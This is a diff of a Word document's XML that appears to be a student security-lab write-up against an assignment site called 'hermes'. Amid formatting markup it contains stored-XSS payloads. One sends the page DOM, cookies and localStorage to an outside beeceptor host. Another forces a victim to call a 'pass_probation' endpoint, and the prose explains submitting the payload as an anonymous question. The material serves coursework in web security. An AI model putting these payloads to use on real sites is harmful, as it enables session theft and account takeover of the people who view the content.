+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>dom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>serializer.serializeToString</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(document) +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "&amp;cookie=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>document.cookie</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "&amp;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>localStorage</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>JSON.stringify</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>localStorage</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13230,7 +15384,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3637" w:type="dxa"/>
+            <w:tcW w:w="2787" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13354,7 +15508,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="573" w:type="dxa"/>
+            <w:tcW w:w="846" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13374,7 +15528,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4809" w:type="dxa"/>
+            <w:tcW w:w="5386" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13389,7 +15543,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3637" w:type="dxa"/>
+            <w:tcW w:w="2787" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13530,7 +15684,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="573" w:type="dxa"/>
+            <w:tcW w:w="846" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13550,7 +15704,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="4809" w:type="dxa"/>
+            <w:tcW w:w="5386" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13561,6 +15715,7 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13577,7 +15732,17 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">!-- </w:t>
+              <w:t>!--</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13643,45 +15808,149 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.onload</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13730,14 +15999,27 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText);</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>this.responseText</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13775,26 +16057,70 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  xhr.open("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhr.send();</w:t>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13829,7 +16155,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3637" w:type="dxa"/>
+            <w:tcW w:w="2787" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -13839,17 +16165,22 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>I</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>njecting this payload as an anonymous question</w:t>
+              <w:t>Submit</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> this payload as an anonymous question</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13862,7 +16193,25 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>when it is opened,</w:t>
+              <w:t>W</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">hen </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>that question</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> is opened,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13874,7 +16223,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>the user “xiandew”</w:t>
+              <w:t>the user “</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xiandew</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>”</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13892,7 +16255,13 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> who reads the question</w:t>
+              <w:t xml:space="preserve"> who reads </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>it</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13904,7 +16273,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> This gives us “Updated” as the response.</w:t>
+              <w:t xml:space="preserve"> This gives us “Updated” as the response</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> instead</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13965,7 +16346,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>In the user profile page, we can see that the user successfully passed the probation and leaked out the sensitive information (in form of the flag)</w:t>
+              <w:t>Back to</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> the user profile page, we can see that the user successfully passed the probation and leaked out the sensitive information (in form of the flag)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14059,7 +16452,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="54" w:name="_Exploitation_2"/>
-      <w:bookmarkStart w:id="55" w:name="_Toc71399664"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc71451236"/>
       <w:bookmarkEnd w:id="54"/>
       <w:r>
         <w:rPr>
@@ -14252,6 +16645,7 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
@@ -14268,7 +16662,17 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">!-- </w:t>
+              <w:t>!--</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14315,45 +16719,149 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
